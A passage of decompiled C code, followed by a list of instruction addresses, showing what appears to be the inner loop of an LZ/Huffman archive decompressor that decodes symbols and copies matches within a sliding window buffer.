					__eflags =  *((intOrPtr*)(_t654 + 4)) -  *((intOrPtr*)(_t654 + 0x24)) + _t505;
					if( *((intOrPtr*)(_t654 + 4)) >  *((intOrPtr*)(_t654 + 0x24)) + _t505) {
						L2:
						 *((char*)(_t654 + 0x4ad0)) = 1;
						return 0;
					} else {
						_t489 =  *((intOrPtr*)(_t654 + 0x4acc)) - 0x10;
						_t666 = _t505 - 1 +  *((intOrPtr*)(_t654 + 0x20));
						 *((intOrPtr*)(_t691 + 0x14)) = _t666;
						 *((intOrPtr*)(_t691 + 0x10)) = _t489;
						 *((intOrPtr*)(_t691 + 0x20)) = _t666;
						__eflags = _t666 - _t489;
						if(_t666 >= _t489) {
							 *((intOrPtr*)(_t691 + 0x20)) = _t489;
						}
						_t347 = _t654 + 4;
						while(1) {
							_t614 =  *(_t663 + 0xe6dc);
							 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
							_t506 =  *_t347;
							__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
							if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
								goto L16;
							}
							L10:
							__eflags = _t506 - _t666;
							if(__eflags > 0) {
								L100:
								_t418 = 1;
								L101:
								return _t418;
							}
							if(__eflags != 0) {
								L13:
								__eflags = _t506 - _t499;
								if(_t506 < _t499) {
									L15:
									__eflags = _t506 -  *((intOrPtr*)(_t654 + 0x4acc));
									if(_t506 >=  *((intOrPtr*)(_t654 + 0x4acc))) {
										L151:
										 *((char*)(_t654 + 0x4ad3)) = 1;
										goto L100;
									}
									goto L16;
								}
								__eflags =  *((char*)(_t654 + 0x4ad2));
								if( *((char*)(_t654 + 0x4ad2)) == 0) {
									goto L151;
								}
								goto L15;
							}
							__eflags =  *(_t654 + 8) -  *((intOrPtr*)(_t654 + 0x1c));
							if( *(_t654 + 8) >=  *((intOrPtr*)(_t654 + 0x1c))) {
								goto L100;
							}
							goto L13;
							L16:
							_t507 =  *((intOrPtr*)(_t663 + 0x4b3c));
							__eflags = (_t507 -  *(_t663 + 0x7c) & _t614) - 0x1004;
							if((_t507 -  *(_t663 + 0x7c) & _t614) >= 0x1004) {
								L21:
								_t667 = _t654 + 4;
								_t351 = E0100A800(_t667);
								_t352 =  *(_t654 + 0xb4);
								_t616 = _t351 & 0x0000fffe;
								__eflags = _t616 -  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4));
								if(_t616 >=  *((intOrPtr*)(_t654 + 0x34 + _t352 * 4))) {
									_t490 = 0xf;
									_t353 = _t352 + 1;
									__eflags = _t353 - _t490;
									if(_t353 >= _t490) {
										L30:
										_t510 =  *(_t667 + 4) + _t490;
										 *(_t667 + 4) = _t510 & 0x00000007;
										_t355 = _t510 >> 3;
										 *_t667 =  *_t667 + _t355;
										_t512 = 0x10;
										_t515 =  *((intOrPtr*)(_t654 + 0x74 + _t490 * 4)) + (_t616 -  *((intOrPtr*)(_t654 + 0x30 + _t490 * 4)) >> _t512 - _t490);
										__eflags = _t515 -  *((intOrPtr*)(_t654 + 0x30));
										asm("sbb eax, eax");
										_t356 = _t355 & _t515;
										__eflags = _t356;
										_t619 =  *(_t654 + 0xcb8 + _t356 * 2) & 0x0000ffff;
										_t347 = _t654 + 4;
										L31:
										__eflags = _t619 - 0x100;
										if(_t619 >= 0x100) {
											__eflags = _t619 - 0x106;
											if(_t619 < 0x106) {
												__eflags = _t619 - 0x100;
												if(_t619 != 0x100) {
													__eflags = _t619 - 0x101;
													if(_t619 != 0x101) {
														_t620 = _t619 + 0xfffffefe;
														__eflags = _t620;
														_t518 =  &((_t663 + 0x60)[_t620]);
														_t491 =  *_t518;
														 *(_t691 + 0x24) = _t491;
														if(_t620 == 0) {
															L122:
															_t668 = _t654 + 4;
															 *(_t663 + 0x60) = _t491;
															_t357 = E0100A800(_t668);
															_t358 =  *(_t654 + 0x2d78);
															_t622 = _t357 & 0x0000fffe;
															__eflags = _t622 -  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4));
															if(_t622 >=  *((intOrPtr*)(_t654 + 0x2cf8 + _t358 * 4))) {
																_t492 = 0xf;
																_t359 = _t358 + 1;
																__eflags = _t359 - _t492;
																if(_t359 >= _t492) {
																	L130:
																	_t521 =  *(_t668 + 4) + _t492;
																	 *(_t668 + 4) = _t521 & 0x00000007;
																	_t361 = _t521 >> 3;
																	 *_t668 =  *_t668 + _t361;
																	_t523 = 0x10;
																	_t526 =  *((intOrPtr*)(_t654 + 0x2d38 + _t492 * 4)) + (_t622 -  *((intOrPtr*)(_t654 + 0x2cf4 + _t492 * 4)) >> _t523 - _t492);
																	__eflags = _t526 -  *((intOrPtr*)(_t654 + 0x2cf4));
																	asm("sbb eax, eax");
																	_t362 = _t361 & _t526;
																	__eflags = _t362;
																	_t363 =  *(_t654 + 0x397c + _t362 * 2) & 0x0000ffff;
																	L131:
																	_t493 = _t363 & 0x0000ffff;
																	__eflags = _t493 - 8;
																	if(_t493 >= 8) {
																		_t671 = (_t493 >> 2) - 1;
																		_t493 = (_t493 & 0x00000003 | 0x00000004) << _t671;
																		__eflags = _t493;
																	} else {
																		_t671 = 0;
																	}
																	_t496 = _t493 + 2;
																	__eflags = _t671;
																	if(_t671 != 0) {
																		_t390 = E0100A800(_t654 + 4);
																		_t532 = 0x10;
																		_t496 = _t496 + (_t390 >> _t532 - _t671);
																		_t535 =  *(_t654 + 8) + _t671;
																		 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t535 >> 3);
																		_t536 = _t535 & 0x00000007;
																		__eflags = _t536;
																		 *(_t654 + 8) = _t536;
																	}
																	_t625 =  *(_t663 + 0x7c);
																	_t673 = _t625 -  *(_t691 + 0x24);
																	_t365 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
																	 *(_t663 + 0x74) = _t496;
																	__eflags = _t673 - _t365;
																	if(_t673 >= _t365) {
																		L147:
																		_t347 = _t654 + 4;
																		__eflags = _t496;
																		if(_t496 == 0) {
																			goto L7;
																		}
																		_t655 =  *(_t663 + 0xe6dc);
																		do {
																			_t656 = _t655 & _t673;
																			_t673 = _t673 + 1;
																			 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t656 +  *((intOrPtr*)(_t663 + 0x4b40))));
																			_t655 =  *(_t663 + 0xe6dc);
																			 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t655;
																			_t496 = _t496 - 1;
																			__eflags = _t496;
																		} while (_t496 != 0);
																		L150:
																		_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																		L33:
																		_t347 = _t654 + 4;
																		goto L7;
																	} else {
																		__eflags = _t625 - _t365;
																		if(_t625 >= _t365) {
																			goto L147;
																		}
																		_t370 =  *((intOrPtr*)(_t663 + 0x4b40));
																		_t675 = _t673 + _t370;
																		_t529 = _t370 + _t625;
																		 *(_t691 + 0x1c) = _t529;
																		 *(_t663 + 0x7c) = _t625 + _t496;
																		__eflags =  *(_t691 + 0x24) - _t496;
																		if( *(_t691 + 0x24) >= _t496) {
																			__eflags = _t496 - 8;
																			if(_t496 < 8) {
																				L85:
																				_t347 = _t654 + 4;
																				__eflags = _t498;
																				if(_t498 == 0) {
																					L7:
																					L8:
																					_t666 =  *((intOrPtr*)(_t691 + 0x14));
																					while(1) {
																						_t614 =  *(_t663 + 0xe6dc);
																						 *(_t663 + 0x7c) =  *(_t663 + 0x7c) & _t614;
																						_t506 =  *_t347;
																						__eflags = _t506 -  *((intOrPtr*)(_t691 + 0x20));
																						if(_t506 <  *((intOrPtr*)(_t691 + 0x20))) {
																							goto L16;
																						}
																						goto L10;
																					}
																				}
																				 *_t529 =  *_t675;
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 1;
																				if(_t498 <= 1) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 2;
																				if(_t498 <= 2) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 3;
																				if(_t498 <= 3) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 4;
																				if(_t498 <= 4) {
																					goto L7;
																				}
																				 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																				_t347 = _t654 + 4;
																				__eflags = _t498 - 5;
																				if(_t498 <= 5) {
																					goto L7;
																				}
																				__eflags = _t498 - 6;
																				_t499 =  *((intOrPtr*)(_t691 + 0x10));
																				 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																				_t347 = _t654 + 4;
																				if(_t498 > 6) {
																					 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																					_t347 = _t654 + 4;
																				}
																				goto L8;
																			}
																			_t380 = _t496 >> 3;
																			__eflags = _t380;
																			 *(_t691 + 0x24) = _t380;
																			_t657 = _t380;
																			do {
																				E0101F4B0(_t529, _t675, 8);
																				_t530 =  *((intOrPtr*)(_t691 + 0x28));
																				_t691 = _t691 + 0xc;
																				_t529 = _t530 + 8;
																				_t675 = _t675 + 8;
																				_t496 = _t496 - 8;
																				 *(_t691 + 0x1c) = _t529;
																				_t657 = _t657 - 1;
																				__eflags = _t657;
																			} while (_t657 != 0);
																			L84:
																			_t654 =  *((intOrPtr*)(_t691 + 0x3c));
																			goto L85;
																		}
																		__eflags = _t496 - 8;
																		if(_t496 < 8) {
																			goto L85;
																		}
																		_t628 = _t496 >> 3;
																		__eflags = _t628;
																		do {
																			_t496 = _t496 - 8;
																			 *_t529 =  *_t675;
																			 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
																			 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
																			 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
																			 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
																			 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
																			 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
																			_t389 =  *((intOrPtr*)(_t675 + 7));
																			_t675 = _t675 + 8;
																			 *((char*)(_t529 + 7)) = _t389;
																			_t529 = _t529 + 8;
																			_t628 = _t628 - 1;
																			__eflags = _t628;
																		} while (_t628 != 0);
																		goto L85;
																	}
																}
																_t538 = _t654 + (_t359 + 0xb3e) * 4;
																while(1) {
																	__eflags = _t622 -  *_t538;
																	if(_t622 <  *_t538) {
																		break;
																	}
																	_t359 = _t359 + 1;
																	_t538 = _t538 + 4;
																	__eflags = _t359 - 0xf;
																	if(_t359 < 0xf) {
																		continue;
																	}
																	goto L130;
																}
																_t492 = _t359;
																goto L130;
															}
															_t539 = 0x10;
															_t629 = _t622 >> _t539 - _t358;
															_t542 = ( *(_t629 + _t654 + 0x2d7c) & 0x000000ff) +  *(_t668 + 4);
															 *_t668 =  *_t668 + (_t542 >> 3);
															 *(_t668 + 4) = _t542 & 0x00000007;
															_t363 =  *(_t654 + 0x317c + _t629 * 2) & 0x0000ffff;
															goto L131;
														} else {
															goto L121;
														}
														do {
															L121:
															 *_t518 =  *(_t518 - 4);
															_t518 = _t518 - 4;
															_t620 = _t620 - 1;
															__eflags = _t620;
														} while (_t620 != 0);
														goto L122;
													}
													_t498 =  *(_t663 + 0x74);
													_t666 =  *((intOrPtr*)(_t691 + 0x14));
													__eflags = _t498;
													if(_t498 == 0) {
														L23:
														_t499 =  *((intOrPtr*)(_t691 + 0x10));
														continue;
													}
													_t397 =  *(_t663 + 0x60);
													_t630 =  *(_t663 + 0x7c);
													_t677 = _t630 - _t397;
													 *(_t691 + 0x1c) = _t397;
													_t399 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													__eflags = _t677 - _t399;
													if(_t677 >= _t399) {
														L116:
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L7;
														}
														_t658 =  *(_t663 + 0xe6dc);
														do {
															_t659 = _t658 & _t677;
															_t677 = _t677 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)(_t659 +  *((intOrPtr*)(_t663 + 0x4b40))));
															_t658 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t658;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													}
													__eflags = _t630 - _t399;
													if(_t630 >= _t399) {
														goto L116;
													}
													_t404 =  *((intOrPtr*)(_t663 + 0x4b40));
													_t675 = _t677 + _t404;
													_t529 = _t404 + _t630;
													 *(_t691 + 0x24) = _t529;
													 *(_t663 + 0x7c) = _t630 + _t498;
													__eflags =  *(_t691 + 0x1c) - _t498;
													if( *(_t691 + 0x1c) >= _t498) {
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t407 = _t498 >> 3;
														__eflags = _t407;
														_t660 = _t407;
														do {
															E0101F4B0(_t529, _t675, 8);
															_t545 =  *((intOrPtr*)(_t691 + 0x30));
															_t691 = _t691 + 0xc;
															_t529 = _t545 + 8;
															_t675 = _t675 + 8;
															_t498 = _t498 - 8;
															 *(_t691 + 0x24) = _t529;
															_t660 = _t660 - 1;
															__eflags = _t660;
														} while (_t660 != 0);
														goto L84;
													}
													__eflags = _t498 - 8;
													if(_t498 < 8) {
														goto L85;
													}
													_t633 = _t498 >> 3;
													__eflags = _t633;
													do {
														_t498 = _t498 - 8;
														 *_t529 =  *_t675;
														 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
														 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
														 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
														 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
														 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
														 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
														_t416 =  *((intOrPtr*)(_t675 + 7));
														_t675 = _t675 + 8;
														 *((char*)(_t529 + 7)) = _t416;
														_t529 = _t529 + 8;
														_t633 = _t633 - 1;
														__eflags = _t633;
													} while (_t633 != 0);
													goto L85;
												}
												_push(_t691 + 0x28);
												_t417 = E01013952(_t663, _t347);
												__eflags = _t417;
												if(_t417 == 0) {
													goto L100;
												}
												_t420 = E01011E22(_t663, _t691 + 0x28);
												__eflags = _t420;
												if(_t420 != 0) {
													goto L33;
												}
												goto L100;
											}
											_t501 = _t619 - 0x106;
											__eflags = _t501 - 8;
											if(_t501 >= 8) {
												_t680 = (_t501 >> 2) - 1;
												_t501 = (_t501 & 0x00000003 | 0x00000004) << _t680;
												__eflags = _t501;
											} else {
												_t680 = 0;
											}
											_t498 = _t501 + 2;
											__eflags = _t680;
											if(_t680 == 0) {
												_t681 = _t654 + 4;
											} else {
												_t472 = E0100A800(_t347);
												_t600 = 0x10;
												_t498 = _t498 + (_t472 >> _t600 - _t680);
												_t603 =  *(_t654 + 8) + _t680;
												_t681 = _t654 + 4;
												 *_t681 =  *_t681 + (_t603 >> 3);
												 *(_t681 + 4) = _t603 & 0x00000007;
											}
											_t421 = E0100A800(_t681);
											_t422 =  *(_t654 + 0xfa0);
											_t635 = _t421 & 0x0000fffe;
											__eflags = _t635 -  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4));
											if(_t635 >=  *((intOrPtr*)(_t654 + 0xf20 + _t422 * 4))) {
												_t682 = 0xf;
												_t423 = _t422 + 1;
												__eflags = _t423 - _t682;
												if(_t423 >= _t682) {
													L49:
													_t552 =  *(_t654 + 8) + _t682;
													 *(_t654 + 8) = _t552 & 0x00000007;
													_t425 = _t552 >> 3;
													 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + _t425;
													_t554 = 0x10;
													_t557 =  *((intOrPtr*)(_t654 + 0xf60 + _t682 * 4)) + (_t635 -  *((intOrPtr*)(_t654 + 0xf1c + _t682 * 4)) >> _t554 - _t682);
													__eflags = _t557 -  *((intOrPtr*)(_t654 + 0xf1c));
													asm("sbb eax, eax");
													_t426 = _t425 & _t557;
													__eflags = _t426;
													_t427 =  *(_t654 + 0x1ba4 + _t426 * 2) & 0x0000ffff;
													goto L50;
												}
												_t593 = _t654 + (_t423 + 0x3c8) * 4;
												while(1) {
													__eflags = _t635 -  *_t593;
													if(_t635 <  *_t593) {
														break;
													}
													_t423 = _t423 + 1;
													_t593 = _t593 + 4;
													__eflags = _t423 - 0xf;
													if(_t423 < 0xf) {
														continue;
													}
													goto L49;
												}
												_t682 = _t423;
												goto L49;
											} else {
												_t594 = 0x10;
												_t652 = _t635 >> _t594 - _t422;
												_t597 = ( *(_t652 + _t654 + 0xfa4) & 0x000000ff) +  *(_t681 + 4);
												 *_t681 =  *_t681 + (_t597 >> 3);
												 *(_t681 + 4) = _t597 & 0x00000007;
												_t427 =  *(_t654 + 0x13a4 + _t652 * 2) & 0x0000ffff;
												L50:
												_t638 = _t427 & 0x0000ffff;
												__eflags = _t638 - 4;
												if(_t638 >= 4) {
													_t430 = (_t638 >> 1) - 1;
													_t638 = (_t638 & 0x00000001 | 0x00000002) << _t430;
													__eflags = _t638;
												} else {
													_t430 = 0;
												}
												 *(_t691 + 0x18) = _t430;
												_t559 = _t638 + 1;
												 *(_t691 + 0x24) = _t559;
												_t683 = _t559;
												 *(_t691 + 0x1c) = _t683;
												__eflags = _t430;
												if(_t430 == 0) {
													L70:
													__eflags = _t683 - 0x100;
													if(_t683 > 0x100) {
														_t498 = _t498 + 1;
														__eflags = _t683 - 0x2000;
														if(_t683 > 0x2000) {
															_t498 = _t498 + 1;
															__eflags = _t683 - 0x40000;
															if(_t683 > 0x40000) {
																_t498 = _t498 + 1;
																__eflags = _t498;
															}
														}
													}
													 *(_t663 + 0x6c) =  *(_t663 + 0x68);
													 *(_t663 + 0x68) =  *(_t663 + 0x64);
													 *(_t663 + 0x64) =  *(_t663 + 0x60);
													 *(_t663 + 0x60) = _t683;
													_t641 =  *(_t663 + 0x7c);
													_t561 = _t641 - _t683;
													_t435 =  *((intOrPtr*)(_t663 + 0xe6d8)) + 0xffffeffc;
													 *(_t663 + 0x74) = _t498;
													 *(_t691 + 0x24) = _t561;
													__eflags = _t561 - _t435;
													if(_t561 >= _t435) {
														L93:
														_t666 =  *((intOrPtr*)(_t691 + 0x14));
														_t347 = _t654 + 4;
														__eflags = _t498;
														if(_t498 == 0) {
															goto L23;
														}
														_t684 =  *(_t663 + 0xe6dc);
														_t661 =  *(_t691 + 0x24);
														do {
															_t685 = _t684 & _t661;
															_t661 = _t661 + 1;
															 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) =  *((intOrPtr*)( *((intOrPtr*)(_t663 + 0x4b40)) + _t685));
															_t684 =  *(_t663 + 0xe6dc);
															 *(_t663 + 0x7c) =  *(_t663 + 0x7c) + 0x00000001 & _t684;
															_t498 = _t498 - 1;
															__eflags = _t498;
														} while (_t498 != 0);
														goto L150;
													} else {
														__eflags = _t641 - _t435;
														if(_t641 >= _t435) {
															goto L93;
														}
														_t440 =  *((intOrPtr*)(_t663 + 0x4b40));
														_t675 = _t440 + _t561;
														_t529 = _t440 + _t641;
														 *(_t691 + 0x24) = _t529;
														 *(_t663 + 0x7c) = _t641 + _t498;
														__eflags =  *(_t691 + 0x1c) - _t498;
														if( *(_t691 + 0x1c) >= _t498) {
															__eflags = _t498 - 8;
															if(_t498 < 8) {
																goto L85;
															}
															_t443 = _t498 >> 3;
															__eflags = _t443;
															 *(_t691 + 0x1c) = _t443;
															_t662 = _t443;
															do {
																E0101F4B0(_t529, _t675, 8);
																_t563 =  *((intOrPtr*)(_t691 + 0x30));
																_t691 = _t691 + 0xc;
																_t529 = _t563 + 8;
																_t675 = _t675 + 8;
																_t498 = _t498 - 8;
																 *(_t691 + 0x24) = _t529;
																_t662 = _t662 - 1;
																__eflags = _t662;
															} while (_t662 != 0);
															goto L84;
														}
														__eflags = _t498 - 8;
														if(_t498 < 8) {
															goto L85;
														}
														_t644 = _t498 >> 3;
														__eflags = _t644;
														do {
															_t498 = _t498 - 8;
															 *_t529 =  *_t675;
															 *((char*)(_t529 + 1)) =  *((intOrPtr*)(_t675 + 1));
															 *((char*)(_t529 + 2)) =  *((intOrPtr*)(_t675 + 2));
															 *((char*)(_t529 + 3)) =  *((intOrPtr*)(_t675 + 3));
															 *((char*)(_t529 + 4)) =  *((intOrPtr*)(_t675 + 4));
															 *((char*)(_t529 + 5)) =  *((intOrPtr*)(_t675 + 5));
															 *((char*)(_t529 + 6)) =  *((intOrPtr*)(_t675 + 6));
															_t452 =  *((intOrPtr*)(_t675 + 7));
															_t675 = _t675 + 8;
															 *((char*)(_t529 + 7)) = _t452;
															_t529 = _t529 + 8;
															_t644 = _t644 - 1;
															__eflags = _t644;
														} while (_t644 != 0);
														goto L85;
													}
												} else {
													__eflags = _t430 - 4;
													if(__eflags < 0) {
														_t453 = E0101815A(_t654 + 4);
														_t565 = 0x20;
														_t568 =  *(_t654 + 8) +  *(_t691 + 0x18);
														_t683 = (_t453 >> _t565 -  *(_t691 + 0x18)) +  *(_t691 + 0x24);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t568 >> 3);
														_t569 = _t568 & 0x00000007;
														__eflags = _t569;
														 *(_t654 + 8) = _t569;
														L69:
														 *(_t691 + 0x1c) = _t683;
														goto L70;
													}
													if(__eflags <= 0) {
														_t645 = _t654 + 4;
													} else {
														_t467 = E0101815A(_t654 + 4);
														_t651 =  *(_t691 + 0x18);
														_t587 = 0x24;
														_t590 = _t651 - 4 +  *(_t654 + 8);
														_t645 = _t654 + 4;
														_t683 = (_t467 >> _t587 - _t651 << 4) +  *(_t691 + 0x24);
														 *_t645 =  *_t645 + (_t590 >> 3);
														 *(_t645 + 4) = _t590 & 0x00000007;
													}
													_t456 = E0100A800(_t645);
													_t457 =  *(_t654 + 0x1e8c);
													_t647 = _t456 & 0x0000fffe;
													__eflags = _t647 -  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4));
													if(_t647 >=  *((intOrPtr*)(_t654 + 0x1e0c + _t457 * 4))) {
														_t571 = 0xf;
														_t458 = _t457 + 1;
														 *(_t691 + 0x18) = _t571;
														__eflags = _t458 - _t571;
														if(_t458 >= _t571) {
															L66:
															_t573 =  *(_t654 + 8) +  *(_t691 + 0x18);
															 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t573 >> 3);
															_t461 =  *(_t691 + 0x18);
															 *(_t654 + 8) = _t573 & 0x00000007;
															_t575 = 0x10;
															_t578 =  *((intOrPtr*)(_t654 + 0x1e4c + _t461 * 4)) + (_t647 -  *((intOrPtr*)(_t654 + 0x1e08 + _t461 * 4)) >> _t575 - _t461);
															__eflags = _t578 -  *((intOrPtr*)(_t654 + 0x1e08));
															asm("sbb eax, eax");
															_t462 = _t461 & _t578;
															__eflags = _t462;
															_t463 =  *(_t654 + 0x2a90 + _t462 * 2) & 0x0000ffff;
															goto L67;
														}
														_t580 = _t654 + (_t458 + 0x783) * 4;
														while(1) {
															__eflags = _t647 -  *_t580;
															if(_t647 <  *_t580) {
																break;
															}
															_t458 = _t458 + 1;
															_t580 = _t580 + 4;
															__eflags = _t458 - 0xf;
															if(_t458 < 0xf) {
																continue;
															}
															goto L66;
														}
														 *(_t691 + 0x18) = _t458;
														goto L66;
													} else {
														_t581 = 0x10;
														_t650 = _t647 >> _t581 - _t457;
														_t584 = ( *(_t650 + _t654 + 0x1e90) & 0x000000ff) +  *(_t654 + 8);
														 *((intOrPtr*)(_t654 + 4)) =  *((intOrPtr*)(_t654 + 4)) + (_t584 >> 3);
														 *(_t654 + 8) = _t584 & 0x00000007;
														_t463 =  *(_t654 + 0x2290 + _t650 * 2) & 0x0000ffff;
														L67:
														_t683 = _t683 + (_t463 & 0x0000ffff);
														goto L69;
													}
												}
											}
										}
										 *( *((intOrPtr*)(_t663 + 0x4b40)) +  *(_t663 + 0x7c)) = _t619;
										_t69 = _t663 + 0x7c;
										 *_t69 =  *(_t663 + 0x7c) + 1;
										__eflags =  *_t69;
										goto L33;
									}
									_t607 = _t654 + (_t353 + 0xd) * 4;
									while(1) {
										__eflags = _t616 -  *_t607;
										if(_t616 <  *_t607) {
											break;
										}
										_t353 = _t353 + 1;
										_t607 = _t607 + 4;
										__eflags = _t353 - 0xf;
										if(_t353 < 0xf) {
											continue;
										}
										goto L30;
									}
									_t490 = _t353;
									goto L30;
								}
								_t608 = 0x10;
								_t653 = _t616 >> _t608 - _t352;
								_t611 = ( *(_t653 + _t654 + 0xb8) & 0x000000ff) +  *(_t667 + 4);
								 *_t667 =  *_t667 + (_t611 >> 3);
								_t347 = _t654 + 4;
								 *(_t347 + 4) = _t611 & 0x00000007;
								_t619 =  *(_t654 + 0x4b8 + _t653 * 2) & 0x0000ffff;
								goto L31;
							}
							__eflags = _t507 -  *(_t663 + 0x7c);
							if(_t507 ==  *(_t663 + 0x7c)) {
								goto L21;
							}
							E01014BB3(_t663);
							__eflags =  *((intOrPtr*)(_t663 + 0x4c5c)) -  *((intOrPtr*)(_t663 + 0x4c4c));
							if(__eflags > 0) {
								L152:
								_t418 = 0;
								goto L101;
							}
							if(__eflags < 0) {
								goto L21;
							}
							__eflags =  *((intOrPtr*)(_t663 + 0x4c58)) -  *((intOrPtr*)(_t663 + 0x4c48));
							if( *((intOrPtr*)(_t663 + 0x4c58)) >  *((intOrPtr*)(_t663 + 0x4c48))) {
								goto L152;
							}
							goto L21;
						}
					}
				}
				 *((char*)(_t654 + 0x2c)) = 1;
				_push(_t654 + 0x30);
				_push(_t654 + 0x18);
				_push(_t654 + 4);
				if(E01013D6D(__ecx) != 0) {
					goto L3;
				}
				goto L2;
			}

0x010170c4
0x010170c8
0x010170ce
0x010170f7
0x010170fa
0x010170ff
0x01017102
0x010170e9
0x010170e9
0x00000000
0x01017104
0x0101710f
0x01017112
0x01017115
0x01017119
0x0101711d
0x01017121
0x01017123
0x01017125
0x01017125
0x01017129
0x01017136
0x01017136
0x0101713c
0x0101713f
0x01017141
0x01017145
0x00000000
0x00000000
0x01017147
0x01017147
0x01017149
0x010176d4
0x010176d4
0x010176d6
0x00000000
0x010176d7
0x0101714f
0x0101715d
0x0101715d
0x0101715f
0x0101716e
0x0101716e
0x01017174
0x01017a23
0x01017a23
0x00000000
0x01017a23
0x00000000
0x01017174
0x01017161
0x01017168
0x00000000
0x00000000
0x00000000
0x01017168
0x01017154
0x01017157
0x00000000
0x00000000
0x00000000
0x0101717a
0x0101717a
0x01017187
0x0101718c
0x010171c0
0x010171c0
0x010171c5
0x010171cc
0x010171d2
0x010171d8
0x010171dc
0x01017216
0x01017217
0x01017218
0x0101721a
0x01017233
0x01017236
0x0101723d
0x01017240
0x01017243
0x0101724c
0x01017255
0x01017257
0x0101725a
0x0101725c
0x0101725c
0x0101725e
0x01017266
0x01017269
0x0101726e
0x01017270
0x01017289
0x0101728f
0x010176ab
0x010176ad
0x010176e0
0x010176e6
0x01017802
0x01017802
0x0101780b
0x0101780e
0x01017810
0x01017814
0x01017823
0x01017823
0x01017826
0x0101782b
0x01017832
0x01017838
0x0101783e
0x01017845
0x01017873
0x01017874
0x01017875
0x01017877
0x01017893
0x01017896
0x0101789d
0x010178a0
0x010178a3
0x010178af
0x010178bb
0x010178bd
0x010178c3
0x010178c5
0x010178c5
0x010178c7
0x010178cf
0x010178cf
0x010178d2
0x010178d5
0x010178e6
0x010178e9
0x010178e9
0x010178d7
0x010178d7
0x010178d7
0x010178eb
0x010178ee
0x010178f0
0x010178f5
0x010178fc
0x01017904
0x01017906
0x0101790d
0x01017910
0x01017910
0x01017913
0x01017913
0x01017916
0x01017921
0x01017925
0x0101792a
0x0101792d
0x0101792f
0x010179e3
0x010179e3
0x010179e6
0x010179e8
0x00000000
0x00000000
0x010179ee
0x010179f4
0x010179fa
0x010179ff
0x01017a03
0x01017a09
0x01017a12
0x01017a15
0x01017a15
0x01017a15
0x01017a1a
0x01017a1a
0x01017281
0x01017281
0x00000000
0x01017935
0x01017935
0x01017937
0x00000000
0x00000000
0x0101793d
0x01017943
0x01017945
0x0101794b
0x0101794f
0x01017952
0x01017956
0x010179a8
0x010179ab
0x010175df
0x010175df
0x010175e2
0x010175e4
0x0101712e
0x01017132
0x01017132
0x01017136
0x01017136
0x0101713c
0x0101713f
0x01017141
0x01017145
0x00000000
0x00000000
0x00000000
0x01017145
0x01017136
0x010175ed
0x010175ef
0x010175f2
0x010175f5
0x00000000
0x00000000
0x010175fe
0x01017601
0x01017604
0x01017607
0x00000000
0x00000000
0x01017610
0x01017613
0x01017616
0x01017619
0x00000000
0x00000000
0x01017622
0x01017625
0x01017628
0x0101762b
0x00000000
0x00000000
0x01017634
0x01017637
0x0101763a
0x0101763d
0x00000000
0x00000000
0x01017646
0x01017649
0x0101764d
0x01017650
0x01017653
0x0101765c
0x0101765f
0x0101765f
0x00000000
0x01017653
0x010179b3
0x010179b3
0x010179b6
0x010179ba
0x010179bc
0x010179c0
0x010179c5
0x010179c9
0x010179cc
0x010179cf
0x010179d2
0x010179d5
0x010179d9
0x010179d9
0x010179d9
0x010175db
0x010175db
0x00000000
0x010175db
0x01017958
0x0101795b
0x00000000
0x00000000
0x01017963
0x01017963
0x01017966
0x01017969
0x0101796c
0x01017971
0x01017977
